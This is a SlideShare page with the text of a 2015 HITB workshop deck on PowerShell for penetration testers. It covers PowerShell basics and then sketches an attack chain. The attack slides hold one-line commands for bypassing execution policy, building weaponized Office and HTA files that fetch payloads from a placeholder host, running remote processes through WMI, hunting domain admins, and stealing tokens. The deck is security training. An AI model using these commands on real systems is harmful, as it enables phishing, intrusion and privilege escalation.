SlideShare uma empresa Scribd logo

Workshop: PowerShell for Penetration Testers

Transferir como PPTX, PDF
Nikhil Mittal
Nikhil Mittal

Slides of the Workshop I gave at HITB, Amsterdam 2015

Tecnologia
1 de 53
PowerShell for Penetration Testers Nikhil Mittal
Get-Host • Hacker, Trainer, Speaker, Penetration Tester • Creator of Kautilya and Nishang. • Twitter: @nikhil_mitt • Blog – http://labofapenetrationtester.com • Interested in Offensive Information Security, new attack vectors and methodologies to pwn systems. • Previous talks: Defcon, Blackhat, Troopers, DeepSec, EuSecwest, Hackfest, PHDays etc. 2PowerShell for Penetration Testers HITB
$PFPTLab = Get-Content • What is PowerShell • Why PowerShell • Executing commands, scripts and modules • Extended PowerShell usage • A Penetration Testing Scenario • Defenses 3PowerShell for Penetration Testers HITB
$PFPTLab | Format-Custom • This is a hands-on workshop, keep your Windows machines/VMs ready. • We will stick to PowerShell v2, unless specified otherwise. • For language basics, we will go with bare minimum to be able to cover interesting stuff in couple of hours. • The workshop assumes zero knowledge of PowerShell so if you know something: do {Start-Sleep –s 60} while {$SomethingNew –ne $true} 4PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “What is PowerShell"} • “Windows PowerShell® is a task-based command- line shell and scripting language designed especially for system administration. Built on the .NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows.” http://technet.microsoft.com/en- us/library/bb978526.aspx 5PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “Why PowerShell"} • Present by default on modern Windows OS. • Tightly integrated with Windows and allows interaction with .Net, Filesystem, Registry, API, Certificates, COM, native commands, network, domain etc. • Expandable with use of .Net framework. • Easy to learn. • Less dependency on *nix based tools. • Trusted by System Admins, Blue Teams and (mostly) AV etc. 6PowerShell for Penetration Testers HITB
Why PowerShell? PowerShell for Penetration Testers HITB 7 http://www.quickmeme.com/ONE-OF-US
about_PowerShell.exe • powershell.exe is the console part of PowerShell. • Execute native commands, cmdlets, functions and scripts. • Supports tab completion, command aliases, Operators etc. • Provides various options and execution parameters. 8PowerShell for Penetration Testers HITB
Invoke-HandsOn • Try running powershell.exe and Write-Output “Hello World” • Try usual bash and cmd commands. 9PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “powershell.exe"} • powershell.exe is the console part of PowerShell. • Execute native commands, cmdlets, functions and scripts. • Supports tab completion, command aliases, Operators etc. • Provides various options and execution parameters. 10PowerShell for Penetration Testers HITB
Get-Help Get-Help • Easy to use and very useful. • This is the first place to go for learning something new or looking for solution to a problem. • Detailed help for cmdlets, conceptual topics, scripts, functions and modules. • Supports wildcards. • You may need to run Update-Help (v3 onwards). 11PowerShell for Penetration Testers HITB
Get-Help Get-Help • Use with about_* to list help about a conceptual topic. • Various parameters could be passed to Get-Help Get-Help Get-Help –Full Get-Help Get-Command -Examples 12PowerShell for Penetration Testers HITB
$Exercise[0] 1. Use PowerShell help system to list everything available. 2. List help about “process”. 3. List help about powershell.exe conceptual topic. 13PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “cmdlets"} • A Cmdlet is pronounced as “command let”. • Cmdlets are task based compiled .Net classes. • Certainly one of the best features of PowerShell. • They follow a Verb-Noun naming convention. • Cmdlets have aliases. • Like every other command in PowerShell, cmdlets return objects. 14PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “cmdlets"} • Explore cmdlets Get-Command –CommandType Cmdlet • Explore cmdlets based on a verb Get-Command –Verb Get • Get-Command also supports wildcards. 15PowerShell for Penetration Testers HITB
Invoke-HandsOn • I need a count shout for number of Cmdlets you have on your machine. Get-Command –CommandType Cmdlet | Measure-Object • As you can see, PowerShell supports the pipe (|) operator as well. 16PowerShell for Penetration Testers HITB
$Exercise[1] 1. I need names of three cmdlets each from everyone which can be useful in Penetration Tests. 17PowerShell for Penetration Testers HITB
about_Windows_PowerShell_ISE • A GUI Scripting environment. • Tab completion, context-sensitive help, syntax highlighting, selective execution, in-line help are some of the useful features. • PowerShell scripts have .ps1 extension. 18PowerShell for Penetration Testers HITB
Invoke-HandsOn 1. Write a script which prints Hello World. 2. Save it and execute it. 19PowerShell for Penetration Testers HITB
about_Execution_Policies 20PowerShell for Penetration Testers HITB
about_Execution_Policies • Execution Policy is present to stop a user from accidently running scripts. • There are numerous ways to bypass it: powershell.exe –ExecutionPolicy bypass .script.ps1 powershell.exe –EncodedCommand <> powershell.exe –c <> Read: 15 ways to bypass PowerShell execution policy https://www.netspi.com/blog/entryid/238/15-ways-to- bypass-the-powershell-execution-policy 21PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “Variables"} • Variables are declared in the form $varname. • Variables can hold outputs from Cmdlets, native commands, functions etc. as each one returns an object or array of objects. Examples: $DirList = Get-Childitem $UserList = & "net" "user" 22PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “Types"} • PowerShell is not strictly typed. • You need not specify the Type of a variable. • If required, Type conversion could be done with the cast [] operator. 23PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “Statements"} • Conditional Statements – If, else, elseif, Switch • Loop Statements – while() {}, do {} while(), do {} until(), for(;;){}, foreach ( in ){} – ForEach-Object 24PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “Functions"} • Basic Declaration function <function_name> ( param1, param2) { do stuff } • Calling a function <function_name> <value1> <value2> • param statement provides advanced attributes for function parameters. 25PowerShell for Penetration Testers HITB
Invoke-HandsOn • Open Check-RegistryKey.ps1 26PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “Basics of Modules"} • A simplest module is a PowerShell script with the extension .psm1 • Use Get-Module -ListAvailable to list modules. • Use Import-Module <modulepath>to import a module. • Use Get-Command –Module <Modulename> to list functions exported by a module. 27PowerShell for Penetration Testers HITB
$Exercise[2] 1. Convert the script Check-RegistryKey.ps1 to a script module. 2. Try importing the module and use its functions. 28PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “.Net with PowerShell"} • Most powerful feature of PowerShell. Great to extend the existing capabilities of PowerShell. • Useful for loading .Net assemblies, using Windows API, using .Net code and classes in a PowerShell script. 29PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “.Net with PowerShell"} Exploring .Net classes $ProcClass = [AppDomain]::CurrentDomain.GetA ssemblies() | ForEach-Object {$_.GetTypes()}| where {$_.IsPublic -eq "True“} | where {$_.Name -eq “Process”} 30PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “.Net with PowerShell"} Using .Net Classes • Static Methods $ProcClass | Get-Member –Static $ProcClass:: GetProcesses() 31PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “.Net with PowerShell"} Using .Net Classes • Creating instance $WebClient = New-Object System.Net.WebClient $WebClient | Get-Member –MemberType Method $WebClient | Get-Member -Name DownloadString | Format-List * $WebClient.DownloadString("http://google.com") 32PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq “.Net with PowerShell"} • Use Add-Type to add .Net code/classes and Windows API to a PowerShell script or session. • See New-DotnetCode.ps1 for example of using .Net code. 33PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq WMI"} • WMI is a treasure trove for hackers. • PowerShell could be used to retrieve information from WMI as well execute commands and scripts. • Explore the cmdlets related to WMI Get-Command -CommandType Cmdlet – Name *wmi* 34PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq WMI"} • To run a PowerShll command using WMI use: Invoke-WmiMethod -Class win32_process -Name create - ArgumentList "powershell -c Get-Process" –ComputerName <> 35PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq COM"} • PowerShell can use COM Objects as well. • Limitless opportunities for automation! $ie = New-Object -ComObject internetexplorer.application $ie | Get-Member 36PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq PenTest Scenario"} • Lets consider a Pen Test scenario: – The Goal of Penetration Test is to get access to get Domain Administrator access (not a very good goal but lets target it for this lab . – Server side attacks have been largely unsuccessful. – Msf payloads are being detected by Anti Virus and other countermeasures. 37PowerShell for Penetration Testers HITB
$Exploitation = $PFPTLab | where- object {$_ -eq Exploitation"} • PowerShell is very useful in getting a foothold system in a target network. • The trust on PowerShell by system administrators and countermeasures like AV makes it an ideal tool for Exploitation. 38PowerShell for Penetration Testers HITB
$Exploitation | where-object {$_ -eq Client Side Attacks"} • PowerShell is an ideal tool for client side attacks on a Windows platform. • It could be used for generating weaponized files for email phishing campaigns and drive by download attacks. • Lets use Client Side attack scripts from Nishang (https://github.com/samratashok/nishang) 39PowerShell for Penetration Testers HITB
$Exploitation | where-object {$_ -eq Client Side Attacks"} • Generating weaponized MS Office Files Out-Word -Payload "powershell.exe - ExecutionPolicy Bypass -noprofile - noexit -c Get-Process“ Out-Word -PayloadURL http://yourwebserver.com/evil.ps1 Out-Excel -Payload "powershell.exe –EncodedCommand <>“ 40PowerShell for Penetration Testers HITB
$Exploitation | where-object {$_ -eq Client Side Attacks"} • Drive by download attacks Out-HTA -PayloadURL http://192.168.254.1/powerpreter.ps m1 -Arguments Check-VM • More weaponized files Out-CHM Out-Shortcut 41PowerShell for Penetration Testers HITB
$Exploitation | where-object {$_ -eq Shells"} • Now that we can run successful client side attacks, we may need shell level access for further attacks. • PowerShell can be used to write shells as well. • Shells in PowerShell can be used with exploits to get access to the target machine. 42PowerShell for Penetration Testers HITB
$Exploitation | where-object {$_ -eq Shells"} • Interactive PowerShell Shells from Nishang • Metasploit’s msfvenom - Meterpreter using PowerShell 43PowerShell for Penetration Testers HITB
$PostExp = $PFPTLab | where-object {$_ -eq Post Exploitation"} • PowerShell is arguably one of the best tools around for Windows Post Exploitation. • We have an interactive PowerShell session on one of the machines on the target and various PowerShell tools can be used now. 44PowerShell for Penetration Testers HITB
$PostExp | where-object {$_ -eq Domain Enumeration"} • We can use Powerview (https://github.com/Veil- Framework/PowerTools/tree/master/Power View) to enumerate the target domain. • The goal is to find a machine where a Domain Admin is logged in. 45PowerShell for Penetration Testers HITB
$PostExp | where-object {$_ -eq Domain Enumeration"} • To find machines which have a domain admin logged in and the current user has access to that machine: Invoke-UserHunter –CheckAccess –Domain <targetdomain> 46PowerShell for Penetration Testers HITB
$PostExp | where-object {$_ -eq Priv Escalation"} • Now we can use the Domain Admin token on the target machine using Invoke- TokenManipulation and some PowerShell hackery: Get-Process -id <DA process> | Invoke-TokenManipulation CreateProcess cmd.exe Invoke-TokenManipulation is a part of Powersploit (https://github.com/mattifestation/PowerSploit) 47PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq Defenses"} • Log Log Log! • Monitor and Analyze the logs. • Understand flow/use of privileges and credentials in your environment. • If a determined attacker can break into any system, a determined system administrator can catch any attacker as well. 49PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq Credits"} Credits/FF to PowerShell hackers (in no particular order) @obscuresec, @mattifestation, @JosephBialek, @Carlos_Perez, @Lee_Holmes, @ScriptingGuys, @BrucePayette, @dave_rel1k, @enigma0x3, @subTee, @harmj0y and other PowerShell bloggers and book writers. 50PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq Closing Remarks"} • Bad guys are already using PowerShell, using it for security testing is imperative now. Both for red teams and blue teams. • PowerShell is the not the future of Windows Penetration Testing, it is the present. 51PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq Self Promotion"} • Check out PowerShell for Penetration Testers two days trainings at: http://www.labofapenetrationtester.com/p/tr ainings.html#pfptschedule 52PowerShell for Penetration Testers HITB
$PFPTLab | where-object {$_ -eq Feedback"} • Please fill the feedback form. • I am looking for contributors. • Nishang is available at https://github.com/samratashok/nishang • Follow me @nikhil_mitt • nikhil.uitrgpv@gmail.com • http://labofapenetrationtester.com/ 53PowerShell for Penetration Testers HITB

Recomendados

Powerpreter: Post Exploitation like a Boss
Powerpreter: Post Exploitation like a BossPowerpreter: Post Exploitation like a Boss
Powerpreter: Post Exploitation like a BossNikhil Mittal
 
PowerShell for Penetration Testers
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration TestersNikhil Mittal
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingNikhil Mittal
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, PowershellRoo7break
 
Automating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShellAutomating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShellEnclaveSecurity
 
Client side attacks using PowerShell
Client side attacks using PowerShellClient side attacks using PowerShell
Client side attacks using PowerShellNikhil Mittal
 
Hacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellHacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellNikhil Mittal
 

Recomendados

Powerpreter: Post Exploitation like a Boss
Powerpreter: Post Exploitation like a BossPowerpreter: Post Exploitation like a Boss
Powerpreter: Post Exploitation like a BossNikhil Mittal
 
PowerShell for Penetration Testers
PowerShell for Penetration TestersPowerShell for Penetration Testers
PowerShell for Penetration TestersNikhil Mittal
 
PowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingPowerShell for Practical Purple Teaming
PowerShell for Practical Purple TeamingNikhil Mittal
 
Catch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueCatch Me If You Can: PowerShell Red vs Blue
Catch Me If You Can: PowerShell Red vs BlueWill Schroeder
 
Power on, Powershell
Power on, PowershellPower on, Powershell
Power on, PowershellRoo7break
 
Automating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShellAutomating Post Exploitation with PowerShell
Automating Post Exploitation with PowerShellEnclaveSecurity
 
Client side attacks using PowerShell
Client side attacks using PowerShellClient side attacks using PowerShell
Client side attacks using PowerShellNikhil Mittal
 
Hacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellHacked? Pray that the Attacker used PowerShell
Hacked? Pray that the Attacker used PowerShellNikhil Mittal
 
Ultimate pen test compromising a highly secure environment (nikhil)
Ultimate pen test compromising a highly secure environment (nikhil)Ultimate pen test compromising a highly secure environment (nikhil)
Ultimate pen test compromising a highly secure environment (nikhil)ClubHack
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016Russel Van Tuyl
 
More fun using Kautilya
More fun using KautilyaMore fun using Kautilya
More fun using KautilyaNikhil Mittal
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Eviljaredhaight
 
Owning windows 8 with human interface devices
Owning windows 8 with human interface devicesOwning windows 8 with human interface devices
Owning windows 8 with human interface devicesNikhil Mittal
 
Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The EmpireRyan Cobb
 
PSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellPSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellWill Schroeder
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMIJoe Slowik
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric WarfareWill Schroeder
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershelljaredhaight
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShellWill Schroeder
 
Forging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active DirectoryForging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active DirectoryNikhil Mittal
 
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...Daniel Bohannon
 
Kautilya: Teensy beyond shell
Kautilya: Teensy beyond shellKautilya: Teensy beyond shell
Kautilya: Teensy beyond shellNikhil Mittal
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItNikhil Mittal
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"Will Schroeder
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationNikhil Mittal
 
Incorporating PowerShell into your Arsenal with PS>Attack
Incorporating PowerShell into your Arsenal with PS>AttackIncorporating PowerShell into your Arsenal with PS>Attack
Incorporating PowerShell into your Arsenal with PS>Attackjaredhaight
 
RACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory DominanceRACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory DominanceNikhil Mittal
 
Pwnstaller
PwnstallerPwnstaller
PwnstallerWill Schroeder
 
Drilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerToolsDrilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerToolsWill Schroeder
 
PowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationPowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationWill Schroeder
 

Mais conteúdo relacionado

Mais procurados

Ultimate pen test compromising a highly secure environment (nikhil)
Ultimate pen test compromising a highly secure environment (nikhil)Ultimate pen test compromising a highly secure environment (nikhil)
Ultimate pen test compromising a highly secure environment (nikhil)ClubHack
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016Russel Van Tuyl
 
More fun using Kautilya
More fun using KautilyaMore fun using Kautilya
More fun using KautilyaNikhil Mittal
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Eviljaredhaight
 
Owning windows 8 with human interface devices
Owning windows 8 with human interface devicesOwning windows 8 with human interface devices
Owning windows 8 with human interface devicesNikhil Mittal
 
Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The EmpireRyan Cobb
 
PSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellPSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellWill Schroeder
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMIJoe Slowik
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric WarfareWill Schroeder
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershelljaredhaight
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShellWill Schroeder
 
Forging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active DirectoryForging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active DirectoryNikhil Mittal
 
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...Daniel Bohannon
 
Kautilya: Teensy beyond shell
Kautilya: Teensy beyond shellKautilya: Teensy beyond shell
Kautilya: Teensy beyond shellNikhil Mittal
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItNikhil Mittal
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationNikhil Mittal
 
Incorporating PowerShell into your Arsenal with PS>Attack
Incorporating PowerShell into your Arsenal with PS>AttackIncorporating PowerShell into your Arsenal with PS>Attack
Incorporating PowerShell into your Arsenal with PS>Attackjaredhaight
 
RACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory DominanceRACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory DominanceNikhil Mittal
 

Mais procurados (20)

Ultimate pen test compromising a highly secure environment (nikhil)
Ultimate pen test compromising a highly secure environment (nikhil)Ultimate pen test compromising a highly secure environment (nikhil)
Ultimate pen test compromising a highly secure environment (nikhil)
 
PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016PowerShell for Cyber Warriors - Bsides Knoxville 2016
PowerShell for Cyber Warriors - Bsides Knoxville 2016
 
More fun using Kautilya
More fun using KautilyaMore fun using Kautilya
More fun using Kautilya
 
Get-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for EvilGet-Help: An intro to PowerShell and how to Use it for Evil
Get-Help: An intro to PowerShell and how to Use it for Evil
 
Owning windows 8 with human interface devices
Owning windows 8 with human interface devicesOwning windows 8 with human interface devices
Owning windows 8 with human interface devices
 
Obfuscating The Empire
Obfuscating The EmpireObfuscating The Empire
Obfuscating The Empire
 
PSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShellPSConfEU - Building an Empire with PowerShell
PSConfEU - Building an Empire with PowerShell
 
SANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMISANS DFIR Prague: PowerShell & WMI
SANS DFIR Prague: PowerShell & WMI
 
Adventures in Asymmetric Warfare
Adventures in Asymmetric WarfareAdventures in Asymmetric Warfare
Adventures in Asymmetric Warfare
 
Pwning with powershell
Pwning with powershellPwning with powershell
Pwning with powershell
 
Building an Empire with PowerShell
Building an Empire with PowerShellBuilding an Empire with PowerShell
Building an Empire with PowerShell
 
Forging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active DirectoryForging Trusts for Deception in Active Directory
Forging Trusts for Deception in Active Directory
 
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
Invoke-CradleCrafter: Moar PowerShell obFUsk8tion & Detection (@('Tech','niqu...
 
Kautilya: Teensy beyond shell
Kautilya: Teensy beyond shellKautilya: Teensy beyond shell
Kautilya: Teensy beyond shell
 
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does ItAMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
AMSI: How Windows 10 Plans to Stop Script-Based Attacks and How Well It Does It
 
Defending Your "Gold"
Defending Your "Gold"Defending Your "Gold"
Defending Your "Gold"
 
Evading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory DominationEvading Microsoft ATA for Active Directory Domination
Evading Microsoft ATA for Active Directory Domination
 
Incorporating PowerShell into your Arsenal with PS>Attack
Incorporating PowerShell into your Arsenal with PS>AttackIncorporating PowerShell into your Arsenal with PS>Attack
Incorporating PowerShell into your Arsenal with PS>Attack
 
RACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory DominanceRACE - Minimal Rights and ACE for Active Directory Dominance
RACE - Minimal Rights and ACE for Active Directory Dominance
 
Pwnstaller
PwnstallerPwnstaller
Pwnstaller
 

Destaque

Drilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerToolsDrilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerToolsWill Schroeder
 
PowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationPowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationWill Schroeder
 
Office 365 & PowerShell - A match made in heaven
Office 365 & PowerShell - A match made in heavenOffice 365 & PowerShell - A match made in heaven
Office 365 & PowerShell - A match made in heavenSébastien Levert
 
Practical PowerShell Programming for Professional People - Extended Edition
Practical PowerShell Programming for Professional People - Extended EditionPractical PowerShell Programming for Professional People - Extended Edition
Practical PowerShell Programming for Professional People - Extended EditionBen Ten (0xA)
 
PowerShell Plus v4.7 Overview
PowerShell Plus v4.7 OverviewPowerShell Plus v4.7 Overview
PowerShell Plus v4.7 OverviewRichard Giles
 
Windows Server 2008 (PowerShell Scripting Uygulamaları)
Windows Server 2008 (PowerShell Scripting Uygulamaları)Windows Server 2008 (PowerShell Scripting Uygulamaları)
Windows Server 2008 (PowerShell Scripting Uygulamaları)ÇözümPARK
 
Powershell Seminar @ ITWorx CuttingEdge Club
Powershell Seminar @ ITWorx CuttingEdge ClubPowershell Seminar @ ITWorx CuttingEdge Club
Powershell Seminar @ ITWorx CuttingEdge ClubEssam Salah
 
Better, Faster, Stronger! Boost Your Team-Based SharePoint Development Using ...
Better, Faster, Stronger! Boost Your Team-Based SharePoint Development Using ...Better, Faster, Stronger! Boost Your Team-Based SharePoint Development Using ...
Better, Faster, Stronger! Boost Your Team-Based SharePoint Development Using ...Richard Calderon
 
PowerShell from *nix user perspective
PowerShell from *nix user perspectivePowerShell from *nix user perspective
PowerShell from *nix user perspectiveJuraj Michálek
 
Managing Virtual Infrastructures With PowerShell
Managing Virtual Infrastructures With PowerShellManaging Virtual Infrastructures With PowerShell
Managing Virtual Infrastructures With PowerShellguesta849bc8b
 
PowerShell 101
PowerShell 101PowerShell 101
PowerShell 101Thomas Lee
 
Getting Started With PowerShell Scripting
Getting Started With PowerShell ScriptingGetting Started With PowerShell Scripting
Getting Started With PowerShell ScriptingRavikanth Chaganti
 
Windows - Having Its Ass Kicked by Puppet and PowerShell Since 2012
Windows - Having Its Ass Kicked by Puppet and PowerShell Since 2012Windows - Having Its Ass Kicked by Puppet and PowerShell Since 2012
Windows - Having Its Ass Kicked by Puppet and PowerShell Since 2012Puppet
 
Introduction to PowerShell
Introduction to PowerShellIntroduction to PowerShell
Introduction to PowerShellSalaudeen Rajack
 
Geek Sync | Using PowerShell with Python and SQL Server
Geek Sync | Using PowerShell with Python and SQL ServerGeek Sync | Using PowerShell with Python and SQL Server
Geek Sync | Using PowerShell with Python and SQL ServerIDERA Software
 
Gray Hat PowerShell - ShowMeCon 2015
Gray Hat PowerShell - ShowMeCon 2015Gray Hat PowerShell - ShowMeCon 2015
Gray Hat PowerShell - ShowMeCon 2015Ben Ten (0xA)
 
Network Mapping with PowerShell
Network Mapping with PowerShellNetwork Mapping with PowerShell
Network Mapping with PowerShellCostin-Alin Neacsu
 
Practical PowerShell Programming for Professional People
Practical PowerShell Programming for Professional PeoplePractical PowerShell Programming for Professional People
Practical PowerShell Programming for Professional PeopleBen Ten (0xA)
 
PowerShell 101 - What is it and Why should YOU Care!
PowerShell 101 - What is it and Why should YOU Care!PowerShell 101 - What is it and Why should YOU Care!
PowerShell 101 - What is it and Why should YOU Care!Thomas Lee
 

Destaque (20)

Drilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerToolsDrilling deeper with Veil's PowerTools
Drilling deeper with Veil's PowerTools
 
PowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege EscalationPowerUp - Automating Windows Privilege Escalation
PowerUp - Automating Windows Privilege Escalation
 
Office 365 & PowerShell - A match made in heaven
Office 365 & PowerShell - A match made in heavenOffice 365 & PowerShell - A match made in heaven
Office 365 & PowerShell - A match made in heaven
 
Practical PowerShell Programming for Professional People - Extended Edition
Practical PowerShell Programming for Professional People - Extended EditionPractical PowerShell Programming for Professional People - Extended Edition
Practical PowerShell Programming for Professional People - Extended Edition
 
PowerShell Plus v4.7 Overview
PowerShell Plus v4.7 OverviewPowerShell Plus v4.7 Overview
PowerShell Plus v4.7 Overview
 
Windows Server 2008 (PowerShell Scripting Uygulamaları)
Windows Server 2008 (PowerShell Scripting Uygulamaları)Windows Server 2008 (PowerShell Scripting Uygulamaları)
Windows Server 2008 (PowerShell Scripting Uygulamaları)
 
Powershell Seminar @ ITWorx CuttingEdge Club
Powershell Seminar @ ITWorx CuttingEdge ClubPowershell Seminar @ ITWorx CuttingEdge Club
Powershell Seminar @ ITWorx CuttingEdge Club
 
Better, Faster, Stronger! Boost Your Team-Based SharePoint Development Using ...
Better, Faster, Stronger! Boost Your Team-Based SharePoint Development Using ...Better, Faster, Stronger! Boost Your Team-Based SharePoint Development Using ...
Better, Faster, Stronger! Boost Your Team-Based SharePoint Development Using ...
 
